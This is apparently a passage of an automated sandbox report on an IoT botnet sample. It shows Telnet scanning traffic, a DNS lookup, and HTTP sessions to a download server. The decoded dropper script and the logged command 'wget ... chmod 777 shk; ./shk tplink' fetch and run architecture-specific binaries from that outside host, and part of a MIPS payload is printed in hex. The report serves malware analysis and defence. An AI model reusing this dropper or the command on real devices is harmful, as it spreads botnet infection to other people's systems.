Mar 29, 2024 09:24:49.319665909 CET	10792	23	192.168.2.23	12.32.11.133
Mar 29, 2024 09:24:49.319665909 CET	10792	23	192.168.2.23	28.237.108.227
Mar 29, 2024 09:24:49.319668055 CET	10792	23	192.168.2.23	113.200.54.193
Mar 29, 2024 09:24:49.319669962 CET	10792	23	192.168.2.23	149.127.94.136
Mar 29, 2024 09:24:49.319673061 CET	10792	23	192.168.2.23	106.213.87.12
Mar 29, 2024 09:24:49.319686890 CET	10792	23	192.168.2.23	178.166.232.106
Mar 29, 2024 09:24:49.319688082 CET	10792	23	192.168.2.23	148.142.94.12
Mar 29, 2024 09:24:49.319698095 CET	10792	23	192.168.2.23	67.168.140.188
Mar 29, 2024 09:24:49.319698095 CET	10792	23	192.168.2.23	77.150.114.125
Mar 29, 2024 09:24:49.319710970 CET	10792	23	192.168.2.23	53.6.247.197
Mar 29, 2024 09:24:49.319719076 CET	10792	23	192.168.2.23	121.0.237.173
Mar 29, 2024 09:24:49.319720984 CET	10792	23	192.168.2.23	247.250.115.207
Mar 29, 2024 09:24:49.319736004 CET	10792	23	192.168.2.23	16.0.75.111
Mar 29, 2024 09:24:49.319736958 CET	10792	23	192.168.2.23	253.128.244.98
Mar 29, 2024 09:24:49.319751024 CET	10792	23	192.168.2.23	170.150.164.106
Mar 29, 2024 09:24:49.319758892 CET	10792	23	192.168.2.23	149.154.18.100
Mar 29, 2024 09:24:49.319766045 CET	10792	23	192.168.2.23	117.126.202.87
Mar 29, 2024 09:24:49.319778919 CET	10792	23	192.168.2.23	242.250.237.231
Mar 29, 2024 09:24:49.319778919 CET	10792	23	192.168.2.23	31.28.248.51
Mar 29, 2024 09:24:49.319788933 CET	10792	23	192.168.2.23	14.211.158.41
Mar 29, 2024 09:24:49.319789886 CET	10792	23	192.168.2.23	86.251.101.150
Mar 29, 2024 09:24:49.319801092 CET	10792	23	192.168.2.23	110.45.109.243
Mar 29, 2024 09:24:49.319802046 CET	10792	23	192.168.2.23	253.249.194.225
Mar 29, 2024 09:24:49.319813967 CET	10792	23	192.168.2.23	151.54.223.95
Mar 29, 2024 09:24:49.319816113 CET	10792	23	192.168.2.23	37.165.189.209
Mar 29, 2024 09:24:49.319828033 CET	10792	23	192.168.2.23	174.72.38.255
Mar 29, 2024 09:24:49.319833994 CET	10792	23	192.168.2.23	136.164.80.135
Mar 29, 2024 09:24:49.319834948 CET	10792	23	192.168.2.23	249.214.37.78
Mar 29, 2024 09:24:49.319850922 CET	10792	23	192.168.2.23	66.177.135.50
Mar 29, 2024 09:24:49.319860935 CET	10792	23	192.168.2.23	33.40.201.141
Mar 29, 2024 09:24:49.319860935 CET	10792	23	192.168.2.23	123.252.186.59
Mar 29, 2024 09:24:49.319875956 CET	10792	23	192.168.2.23	178.19.54.207
Mar 29, 2024 09:24:49.319875956 CET	10792	23	192.168.2.23	106.147.219.116
Mar 29, 2024 09:24:49.319876909 CET	10792	23	192.168.2.23	19.86.125.213
Mar 29, 2024 09:24:49.319876909 CET	10792	23	192.168.2.23	92.176.250.51
Mar 29, 2024 09:24:49.319880009 CET	10792	23	192.168.2.23	112.137.186.237
Mar 29, 2024 09:24:49.319885969 CET	10792	23	192.168.2.23	244.130.245.66
Mar 29, 2024 09:24:49.319902897 CET	10792	23	192.168.2.23	79.234.196.185
Mar 29, 2024 09:24:49.319902897 CET	10792	23	192.168.2.23	196.170.229.15
Mar 29, 2024 09:24:49.319904089 CET	10792	23	192.168.2.23	214.187.169.174
Mar 29, 2024 09:24:49.319905043 CET	10792	23	192.168.2.23	112.202.243.79
Mar 29, 2024 09:24:49.319905043 CET	10792	23	192.168.2.23	54.39.38.199
Mar 29, 2024 09:24:49.319905043 CET	10792	23	192.168.2.23	194.90.196.209
Mar 29, 2024 09:24:49.319907904 CET	10792	23	192.168.2.23	218.139.43.107
Mar 29, 2024 09:24:49.319916964 CET	10792	23	192.168.2.23	207.52.85.53
Mar 29, 2024 09:24:49.319920063 CET	10792	23	192.168.2.23	209.205.236.158
Mar 29, 2024 09:24:49.319926023 CET	10792	23	192.168.2.23	145.146.246.103
Mar 29, 2024 09:24:49.319940090 CET	10792	23	192.168.2.23	102.141.79.65
Mar 29, 2024 09:24:49.319950104 CET	10792	23	192.168.2.23	241.195.198.160
Mar 29, 2024 09:24:49.319950104 CET	10792	23	192.168.2.23	122.126.23.142
Mar 29, 2024 09:24:49.319966078 CET	10792	23	192.168.2.23	3.63.73.214
Mar 29, 2024 09:24:49.319967985 CET	10792	23	192.168.2.23	110.28.220.39
Mar 29, 2024 09:24:49.319978952 CET	10792	23	192.168.2.23	53.194.172.205
Mar 29, 2024 09:24:49.319983006 CET	10792	23	192.168.2.23	90.184.134.114
Mar 29, 2024 09:24:49.319987059 CET	10792	23	192.168.2.23	20.65.160.153
Mar 29, 2024 09:24:49.319987059 CET	10792	23	192.168.2.23	206.177.112.156
Mar 29, 2024 09:24:49.319988966 CET	10792	23	192.168.2.23	136.166.243.129
Mar 29, 2024 09:24:49.319998026 CET	10792	23	192.168.2.23	219.135.115.222
Mar 29, 2024 09:24:49.320003033 CET	10792	23	192.168.2.23	151.250.138.254
Mar 29, 2024 09:24:49.320007086 CET	10792	23	192.168.2.23	182.25.93.59
Mar 29, 2024 09:24:49.320019960 CET	10792	23	192.168.2.23	95.94.198.20
Mar 29, 2024 09:24:49.320034981 CET	10792	23	192.168.2.23	175.204.30.46
Mar 29, 2024 09:24:49.320034981 CET	10792	23	192.168.2.23	203.7.31.245
Mar 29, 2024 09:24:49.320036888 CET	10792	23	192.168.2.23	200.37.1.129
Mar 29, 2024 09:24:49.320039034 CET	10792	23	192.168.2.23	186.245.163.63
Mar 29, 2024 09:24:49.320039034 CET	10792	23	192.168.2.23	173.96.49.71
Mar 29, 2024 09:24:49.320050001 CET	10792	23	192.168.2.23	196.228.69.208
Mar 29, 2024 09:24:49.320063114 CET	10792	23	192.168.2.23	117.91.172.124
Mar 29, 2024 09:24:49.320070982 CET	10792	23	192.168.2.23	115.117.247.27
Mar 29, 2024 09:24:49.320071936 CET	10792	23	192.168.2.23	13.63.164.70
Mar 29, 2024 09:24:49.320077896 CET	10792	23	192.168.2.23	46.251.115.179
Mar 29, 2024 09:24:49.320077896 CET	10792	23	192.168.2.23	102.221.5.1
Mar 29, 2024 09:24:49.320121050 CET	10792	23	192.168.2.23	82.74.23.81
Mar 29, 2024 09:24:49.320122957 CET	10792	23	192.168.2.23	199.112.255.161
Mar 29, 2024 09:24:49.320122957 CET	10792	23	192.168.2.23	21.46.80.3
Mar 29, 2024 09:24:49.320126057 CET	10792	23	192.168.2.23	37.216.23.30
Mar 29, 2024 09:24:49.320126057 CET	10792	23	192.168.2.23	77.252.50.85
Mar 29, 2024 09:24:49.320126057 CET	10792	23	192.168.2.23	165.196.170.127
Mar 29, 2024 09:24:49.320128918 CET	10792	23	192.168.2.23	37.172.212.192
Mar 29, 2024 09:24:49.320133924 CET	10792	23	192.168.2.23	31.22.53.137
Mar 29, 2024 09:24:49.320147038 CET	10792	23	192.168.2.23	135.13.88.70
Mar 29, 2024 09:24:49.320149899 CET	10792	23	192.168.2.23	72.203.212.214
Mar 29, 2024 09:24:49.320151091 CET	10792	23	192.168.2.23	138.231.213.68
Mar 29, 2024 09:24:49.320151091 CET	10792	23	192.168.2.23	146.166.141.218
Mar 29, 2024 09:24:49.320152998 CET	10792	23	192.168.2.23	176.207.13.22
Mar 29, 2024 09:24:49.320158958 CET	10792	23	192.168.2.23	157.61.114.35
Mar 29, 2024 09:24:49.320158958 CET	10792	23	192.168.2.23	196.193.209.85
Mar 29, 2024 09:24:49.320159912 CET	10792	23	192.168.2.23	71.221.200.60
Mar 29, 2024 09:24:49.320159912 CET	10792	23	192.168.2.23	75.23.105.155
Mar 29, 2024 09:24:49.320159912 CET	10792	23	192.168.2.23	64.40.212.255
Mar 29, 2024 09:24:49.320164919 CET	10792	23	192.168.2.23	87.88.109.146
Mar 29, 2024 09:24:49.320164919 CET	10792	23	192.168.2.23	64.19.147.27
Mar 29, 2024 09:24:49.320164919 CET	10792	23	192.168.2.23	206.106.233.159
Mar 29, 2024 09:24:49.320167065 CET	10792	23	192.168.2.23	251.101.67.12
Mar 29, 2024 09:24:49.320169926 CET	10792	23	192.168.2.23	201.78.231.56
Mar 29, 2024 09:24:49.320167065 CET	10792	23	192.168.2.23	138.105.211.235
Mar 29, 2024 09:24:49.320174932 CET	10792	23	192.168.2.23	52.186.157.23
Mar 29, 2024 09:24:49.320177078 CET	10792	23	192.168.2.23	41.74.231.222
Mar 29, 2024 09:24:49.320178986 CET	10792	23	192.168.2.23	48.19.250.193
Mar 29, 2024 09:24:49.320194960 CET	10792	23	192.168.2.23	148.22.240.59
Mar 29, 2024 09:24:49.320194960 CET	10792	23	192.168.2.23	154.72.132.115
Mar 29, 2024 09:24:49.320194960 CET	10792	23	192.168.2.23	70.42.217.2
Mar 29, 2024 09:24:49.320214987 CET	10792	23	192.168.2.23	95.177.202.132
Mar 29, 2024 09:24:49.320214987 CET	10792	23	192.168.2.23	118.162.89.192
Mar 29, 2024 09:24:49.320269108 CET	10792	23	192.168.2.23	68.229.165.83
Mar 29, 2024 09:24:49.320272923 CET	10792	23	192.168.2.23	145.33.255.230
Mar 29, 2024 09:24:49.320271015 CET	10792	23	192.168.2.23	140.45.6.27
Mar 29, 2024 09:24:49.320274115 CET	10792	23	192.168.2.23	98.238.55.232
Mar 29, 2024 09:24:49.320272923 CET	10792	23	192.168.2.23	145.4.180.30
Mar 29, 2024 09:24:49.320297003 CET	10792	23	192.168.2.23	135.177.66.141
Mar 29, 2024 09:24:49.320297003 CET	10792	23	192.168.2.23	109.39.218.145
Mar 29, 2024 09:24:49.320297003 CET	10792	23	192.168.2.23	77.245.178.204
Mar 29, 2024 09:24:49.320297003 CET	10792	23	192.168.2.23	206.145.225.100
Mar 29, 2024 09:24:49.320298910 CET	10792	23	192.168.2.23	196.174.184.99
Mar 29, 2024 09:24:49.320298910 CET	10792	23	192.168.2.23	146.156.8.212
Mar 29, 2024 09:24:49.320298910 CET	10792	23	192.168.2.23	3.211.40.186
Mar 29, 2024 09:24:49.320300102 CET	10792	23	192.168.2.23	247.230.120.147
Mar 29, 2024 09:24:49.320300102 CET	10792	23	192.168.2.23	211.38.62.100
Mar 29, 2024 09:24:49.320305109 CET	10792	23	192.168.2.23	214.19.20.100
Mar 29, 2024 09:24:49.320326090 CET	10792	23	192.168.2.23	105.12.162.209
Mar 29, 2024 09:24:49.320339918 CET	10792	23	192.168.2.23	161.224.204.232
Mar 29, 2024 09:24:49.337116003 CET	80	47772	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.337161064 CET	47772	80	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.416476011 CET	23	10792	199.15.94.9	192.168.2.23
Mar 29, 2024 09:24:49.452523947 CET	36034	33335	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.606358051 CET	23	10792	121.163.237.152	192.168.2.23
Mar 29, 2024 09:24:49.626946926 CET	33335	36034	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.627094984 CET	36034	33335	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.763781071 CET	36034	33335	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:49.938275099 CET	33335	36034	185.224.128.34	192.168.2.23
Mar 29, 2024 09:24:49.946058989 CET	36034	33335	192.168.2.23	185.224.128.34
Mar 29, 2024 09:24:50.451263905 CET	33606	443	192.168.2.23	54.171.230.55
Mar 29, 2024 09:24:50.707278967 CET	43928	443	192.168.2.23	91.189.91.42
Mar 29, 2024 09:24:56.082499027 CET	42836	443	192.168.2.23	91.189.91.43
Mar 29, 2024 09:24:57.618221998 CET	42516	80	192.168.2.23	109.202.202.202
Mar 29, 2024 09:25:11.696244001 CET	43928	443	192.168.2.23	91.189.91.42
Mar 29, 2024 09:25:18.911027908 CET	39250	443	192.168.2.23	34.249.145.219
Mar 29, 2024 09:25:18.911089897 CET	443	39250	34.249.145.219	192.168.2.23
Mar 29, 2024 09:25:18.911248922 CET	39250	443	192.168.2.23	34.249.145.219
Mar 29, 2024 09:25:18.911735058 CET	39250	443	192.168.2.23	34.249.145.219
Mar 29, 2024 09:25:18.911750078 CET	443	39250	34.249.145.219	192.168.2.23
Mar 29, 2024 09:25:21.934794903 CET	42836	443	192.168.2.23	91.189.91.43
Mar 29, 2024 09:25:28.078125000 CET	42516	80	192.168.2.23	109.202.202.202
Mar 29, 2024 09:25:52.650517941 CET	43928	443	192.168.2.23	91.189.91.42
Mar 29, 2024 09:26:13.127628088 CET	42836	443	192.168.2.23	91.189.91.43
Mar 29, 2024 09:26:18.903089046 CET	39250	443	192.168.2.23	34.249.145.219
Mar 29, 2024 09:26:18.944241047 CET	443	39250	34.249.145.219	192.168.2.23
Mar 29, 2024 09:26:52.419676065 CET	443	39250	34.249.145.219	192.168.2.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 09:24:49.307549000 CET	44804	53	192.168.2.23	8.8.8.8
Mar 29, 2024 09:24:49.451960087 CET	53	44804	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 29, 2024 09:24:49.307549000 CET	192.168.2.23	8.8.8.8	0x62c4	Standard query (0)	rooty.cc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 29, 2024 09:24:49.451960087 CET	8.8.8.8	192.168.2.23	0x62c4	No error (0)	rooty.cc		185.224.128.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.224.128.34

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	47770	185.224.128.34	80

Timestamp	Bytes transferred	Direction	Data
Mar 29, 2024 09:24:48.031253099 CET	156	OUT	GET /shk HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 185.224.128.34 Connection: Keep-Alive
Mar 29, 2024 09:24:48.209716082 CET	749	IN	HTTP/1.1 200 OK Date: Fri, 29 Mar 2024 08:24:48 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Thu, 28 Mar 2024 13:03:43 GMT ETag: "1dd-614b8271cc9c0" Accept-Ranges: bytes Content-Length: 477 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 62 69 6e 61 72 79 73 3d 22 6d 69 70 73 20 6d 70 73 6c 20 78 38 36 20 61 72 6d 20 61 72 6d 35 20 61 72 6d 36 20 61 72 6d 37 20 73 68 34 20 70 70 63 20 61 72 63 22 0a 73 65 72 76 65 72 5f 69 70 3d 22 31 38 35 2e 32 32 34 2e 31 32 38 2e 33 34 22 0a 62 69 6e 6f 75 74 3d 22 73 79 73 74 65 6d 22 0a 65 78 65 63 3d 22 79 6f 75 72 20 64 65 76 69 63 65 20 6a 75 73 74 20 67 6f 74 20 69 6e 66 65 63 74 65 64 20 74 6f 20 61 20 62 6f 6f 74 6e 6f 6f 74 22 0a 0a 72 6d 20 2d 72 66 20 24 62 69 6e 6f 75 74 0a 66 6f 72 20 61 72 63 68 20 69 6e 20 24 62 69 6e 61 72 79 73 0a 64 6f 0a 72 6d 20 2d 72 66 20 24 61 72 63 68 0a 63 64 20 2f 74 6d 70 20 7c 7c 20 63 64 20 2f 76 61 72 20 7c 7c 20 63 64 20 2f 64 65 76 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 24 73 65 72 76 65 72 5f 69 70 2f 24 61 72 63 68 20 2d 4f 20 24 62 69 6e 6f 75 74 20 7c 7c 20 63 75 72 6c 20 2d 4f 20 24 62 69 6e 6f 75 74 20 68 74 74 70 3a 2f 2f 24 73 65 72 76 65 72 5f 69 70 2f 24 61 72 63 68 20 7c 7c 20 74 66 74 70 20 2d 67 20 2d 6c 20 24 62 69 6e 6f 75 74 20 2d 72 20 24 61 72 63 68 20 24 73 65 72 76 65 72 5f 69 70 0a 63 68 6d 6f 64 20 37 37 37 20 24 62 69 6e 6f 75 74 0a 73 74 61 74 75 73 3d 60 2e 2f 24 62 69 6e 6f 75 74 20 24 31 60 0a 69 66 20 5b 20 22 24 73 74 61 74 75 73 22 20 3d 20 22 24 65 78 65 63 22 20 5d 3b 20 74 68 65 6e 0a 09 72 6d 20 2d 72 66 20 24 62 69 6e 6f 75 74 0a 09 62 72 65 61 6b 0a 66 69 0a 72 6d 20 2d 72 66 20 24 62 69 6e 6f 75 74 0a 64 6f 6e 65 0a Data Ascii: binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"server_ip="185.224.128.34"binout="system"exec="your device just got infected to a bootnoot"rm -rf $binoutfor arch in $binarysdorm -rf $archcd /tmp \|\| cd /var \|\| cd /dev; wget http://$server_ip/$arch -O $binout \|\| curl -O $binout http://$server_ip/$arch \|\| tftp -g -l $binout -r $arch $server_ipchmod 777 $binoutstatus=`./$binout $1`if [ "$status" = "$exec" ]; thenrm -rf $binoutbreakfirm -rf $binoutdone

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	47772	185.224.128.34	80

Timestamp	Bytes transferred	Direction	Data
Mar 29, 2024 09:24:48.552035093 CET	157	OUT	GET /mips HTTP/1.1 User-Agent: Wget/1.20.3 (linux-gnu) Accept: / Accept-Encoding: identity Host: 185.224.128.34 Connection: Keep-Alive
Mar 29, 2024 09:24:48.726557016 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 29 Mar 2024 08:24:48 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Mar 2024 02:09:01 GMT ETag: "1186c-614c31f94d879" Accept-Ranges: bytes Content-Length: 71788 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 40 02 60 00 00 00 34 00 01 16 3c 00 00 10 07 00 34 00 20 00 03 00 28 00 0e 00 0d 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 01 0d 70 00 01 0d 70 00 00 00 05 00 01 00 00 00 00 00 01 00 01 10 00 00 45 10 00 00 45 10 00 00 00 05 d8 00 00 09 58 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 3c 1c 00 06 27 9c 91 cc 03 99 e0 21 27 bd ff e0 af bc 00 10 af bf 00 1c af bc 00 18 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 91 a8 03 9f e0 21 8f 99 80 20 00 00 00 00 27 39 01 dc 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 91 78 03 9f e0 21 8f 99 80 1c 00 00 00 00 27 39 ff a0 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f bf 00 1c 00 00 00 00 03 e0 00 08 27 bd 00 20 3c 1c 00 06 27 9c 91 40 03 99 e0 21 27 bd ff d8 af bf 00 20 af b1 00 1c af b0 00 18 af bc 00 10 8f 91 80 18 00 00 00 00 92 22 16 00 00 00 00 00 14 40 00 1d 00 00 00 00 8f 90 80 18 00 00 00 00 8e 02 10 20 00 00 00 00 8c 59 00 00 00 00 00 00 13 20 00 09 24 42 00 04 03 20 f8 09 ae 02 10 20 8e 02 10 20 8f bc 00 10 8c 59 00 00 00 00 00 00 17 20 ff f9 24 42 00 04 8f 82 82 4c 00 00 00 00 10 40 00 08 24 02 00 01 8f 84 80 1c 8f 99 82 4c 00 00 00 00 03 20 f8 09 24 84 0d 70 8f bc 00 10 24 02 00 01 a2 22 16 00 8f bf 00 20 8f b1 00 1c 8f b0 00 18 03 e0 00 08 27 bd 00 28 3c 1c 00 06 27 9c 90 84 03 99 e0 21 27 bd ff e0 af bf 00 18 af bc 00 10 8f 84 80 1c 8f 85 80 18 8f 82 80 bc 8f 99 80 bc 24 84 0d 70 10 40 00 05 24 a5 16 04 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f 84 80 18 8f 99 80 c8 8c 82 10 10 00 00 00 00 10 40 00 06 24 84 10 10 13 20 00 04 00 00 00 00 8f bf 00 18 03 20 00 08 27 bd 00 20 8f bf 00 18 00 00 00 00 03 e0 00 08 27 bd 00 20 00 00 00 00 03 e0 00 21 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 8f f4 03 9f e0 21 00 00 f8 21 8f 84 81 cc 8f a5 00 00 27 a6 00 04 24 01 ff f8 03 a1 e8 24 27 bd ff e0 8f 87 82 98 8f 88 81 80 00 00 00 00 af a8 00 10 af a2 00 14 af bd 00 18 8f 99 81 e8 00 00 00 00 03 20 f8 09 00 00 00 00 10 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 1c 00 06 27 9c 8f 90 03 99 e0 21 27 bd d2 88 af bf 2d 74 af be 2d 70 af b7 2d 6c af b6 2d 68 af b5 2d 64 af b4 2d 60 af b3 2d 5c af b2 2d 58 af b1 2d 54 af b0 2d 50 af bc 00 18 30 d0 00 ff 8f 99 81 50 00 e0 88 21 24 06 00 08 00 00 38 21 00 a0 f0 21 30 95 00 ff 02 20 28 21 03 20 f8 09 02 00 20 21 8f bc 00 18 02 00 20 21 8f 99 81 6c 02 20 28 21 24 06 00 18 24 07 00 01 03 20 f8 09 00 40 98 21 8f bc 00 18 12 60 02 ef 00 40 80 21 8f 99 82 48 00 00 00 00 03 20 f8 09 02 60 20 21 28 42 00 80 8f bc 00 18 10 40 02 e7 2a 02 02 01 14 40 00 02 02 00 b0 21 24 16 02 00 8f 99 82 78 02 c0 20 21 03 20 f8 09 24 05 02 9c 8f bc 00 18 00 40 b8 21 00 40 90 21 10 00 00 4c 00 00 a0 21 16 a0 00 02 02 95 00 1a 00 07 00 0d ae 42 00 00 a2 40 00 04 8f 99 81 3c 26 44 02 14 02 60 28 21 00 00 18 10 00 03 11 40 00 03 18 c0 00 43 10 23 03 c2 88 21 8e 22 00 10 03 20 f8 09 ae 42 00 10 92 22 Data Ascii: ELF@`4<4 (@@ppEEXdtQ<'!'<'! '9 <'x!'9 ' <'@!' "@ Y $B Y $BL@$L $p$" '(<'!'$p@$ @$ ' ' !<'!!'$$' <'!'-t-p-l-h-d-`-\-X-T-P0P!$8!!0 (! ! !l (!$$ @!`@!H ` !(B@*@!$x ! $@!@!L!B@<&D`(!@C#!" B"
Mar 29, 2024 09:24:48.726687908 CET	1286	IN	Data Raw: 00 14 8f bc 00 18 2c 42 00 20 10 40 00 0a 00 00 00 00 8f 99 81 fc 8e 30 00 10 03 20 f8 09 00 00 00 00 92 23 00 14 8f bc 00 18 00 62 10 06 02 02 80 21 ae 50 00 10 8f 99 81 fc 00 00 00 00 03 20 f8 09 00 00 00 00 3c 03 cc cc 34 63 cc cd 00 43 00 19 Data Ascii: ,B @0 #b!P <4cC !D#,b@<$cC!B\!@&D$p$$P$$0 &&R*@$
Mar 29, 2024 09:24:48.726774931 CET	1286	IN	Data Raw: 03 20 f8 09 02 02 20 21 8f bc 00 18 00 00 00 00 8f 99 82 48 00 00 00 00 03 20 f8 09 02 00 20 21 8f bc 00 18 02 02 20 21 8f 85 80 1c 8f 99 81 3c 00 00 00 00 03 20 f8 09 24 a5 03 4c 8f bc 00 18 00 00 00 00 8f 99 82 48 00 00 00 00 03 20 f8 09 02 00 Data Ascii: !H ! !< $LH !&%< !H ! !< $lH !&%< !H ! !
Mar 29, 2024 09:24:48.726849079 CET	1286	IN	Data Raw: 00 18 00 40 80 21 8f 99 81 a4 00 00 00 00 03 20 f8 09 00 00 20 21 8f bc 00 18 1a 00 fd b9 02 e0 80 21 10 00 00 3e 00 00 90 21 8e 04 00 00 00 00 00 00 10 82 00 38 00 04 11 42 00 02 10 80 03 a2 10 21 8c 42 00 48 00 00 00 00 00 82 10 06 30 42 00 01 Data Ascii: @! !!>!8B!BH0B@$$b$T'$$,$4$ ',@!,@` &R$b$B
Mar 29, 2024 09:24:48.726937056 CET	1286	IN	Data Raw: 00 5c 10 21 00 40 00 08 26 24 00 14 8f 85 80 1c 10 00 00 0d 24 a5 00 70 8f 85 80 1c 10 00 00 0a 24 a5 00 e0 8f 85 80 1c 10 00 00 07 24 a5 01 50 8f 85 80 1c 10 00 00 04 24 a5 01 c0 8f 85 80 1c 00 00 00 00 24 a5 02 30 03 20 f8 09 00 00 00 00 8f bc Data Ascii: \!@&$$p$$P$$0 <` ! (!&&1DQP*@$ !@!''D@$BC'D@$BCQX!"!DB
Mar 29, 2024 09:24:48.726993084 CET	1286	IN	Data Raw: 00 18 00 00 00 00 8f 99 82 48 00 00 00 00 03 20 f8 09 02 20 20 21 8f bc 00 18 26 65 02 dc 8f 99 81 3c 00 00 00 00 03 20 f8 09 02 22 20 21 8f bc 00 18 00 00 00 00 8f 99 82 48 00 00 00 00 03 20 f8 09 02 20 20 21 8f bc 00 18 02 22 20 21 8f 85 80 1c Data Ascii: H !&e< " !H !" !< $LH !" !< &eQd`PH !" !< $lH !&e<
Mar 29, 2024 09:24:48.727068901 CET	1286	IN	Data Raw: 00 00 00 00 10 82 04 7b 00 04 11 42 00 02 10 80 03 a2 10 21 8c 42 00 c4 00 00 00 00 00 82 10 06 30 42 00 01 10 40 00 12 27 a2 00 28 8f 99 81 54 24 10 00 04 af a2 00 10 af a0 00 24 af b0 00 28 34 05 ff ff 24 06 10 07 03 20 f8 09 27 a7 00 24 00 40 Data Ascii: {B!B0B@'(T$$(4$ '$@!$@T`Rpb' Bu!c$C0c`W$cb.$@')D ! $(dX (!$( $@@3@!
Mar 29, 2024 09:24:48.727142096 CET	1286	IN	Data Raw: 10 21 10 00 00 06 a0 40 29 24 80 43 00 00 24 02 00 3d 10 62 00 0f 26 22 00 01 af a2 00 20 8f 99 82 48 8f b0 00 20 03 20 f8 09 02 c0 20 21 02 02 80 2a 8f bc 00 18 8f b1 00 20 16 00 ff f3 02 d1 10 21 80 43 00 00 24 02 00 3d 14 62 00 27 00 00 00 00 Data Ascii: !@)$C$=b&" H !* !C$=b' QT$(! 0! !@ $B b*@)(rdQT!<$D ! (!b$BbQ\
Mar 29, 2024 09:24:48.727180958 CET	1286	IN	Data Raw: 03 20 f8 09 26 86 04 68 24 03 ff ff 8f bc 00 18 10 43 00 0f 00 00 00 00 8f b1 00 20 8f 99 82 48 02 51 80 21 03 20 f8 09 02 00 20 21 8f bc 00 18 02 00 20 21 8f 99 83 44 00 40 28 21 03 20 f8 09 26 86 04 68 02 22 88 21 8f bc 00 18 af b1 00 20 8f a3 Data Ascii: &h$C HQ! ! !D@(! &h"! C!Q$""$bB!H ! !Q HP! !!@ ! $@! $&,B@
Mar 29, 2024 09:24:48.727245092 CET	1286	IN	Data Raw: 00 01 8f a4 51 54 8e 63 03 a7 02 02 a0 21 02 84 10 21 28 63 00 05 8f bc 00 18 10 60 00 3f a0 40 08 43 8f 99 82 48 00 00 00 00 03 20 f8 09 02 40 20 21 28 42 00 80 8f bc 00 18 10 40 00 37 00 00 00 00 8e 64 03 a7 8f a2 51 54 8f 99 81 3c 24 51 05 c0 Data Ascii: QTc!!(c`?@CH @ !(B@7dQT<$Q!@(! $ !pH0! ! !< $\|Ql&e+p!(#&x$ @ !QTc!#!H! ! C
Mar 29, 2024 09:24:48.901158094 CET	1286	IN	Data Raw: af b0 00 18 af bc 00 10 8f 99 82 00 00 80 a0 21 00 e0 a8 21 30 b1 00 ff 30 d2 00 ff 93 b3 00 4b 03 20 f8 09 24 10 ff ff 8f bc 00 10 10 50 00 3e 00 00 00 00 1c 40 00 3c 00 00 00 00 8f 99 82 00 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 10 10 50 Data Ascii: !!00K $P>@< P@(!HFdC'* ! @ !` $ !L@ !(! `0!

System Behavior

Analysis Process: sh PID: 6211, Parent PID: 6128

General

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	/bin/sh -c "cd /tmp; rm -rf shk; wget http://185.224.128.34/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/usr/bin/rm
Arguments:	rm -rf shk
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/usr/bin/wget
Arguments:	wget http://185.224.128.34/shk
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/usr/bin/chmod
Arguments:	chmod 777 shk
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:24:47
Start date (UTC):	29/03/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:24:47
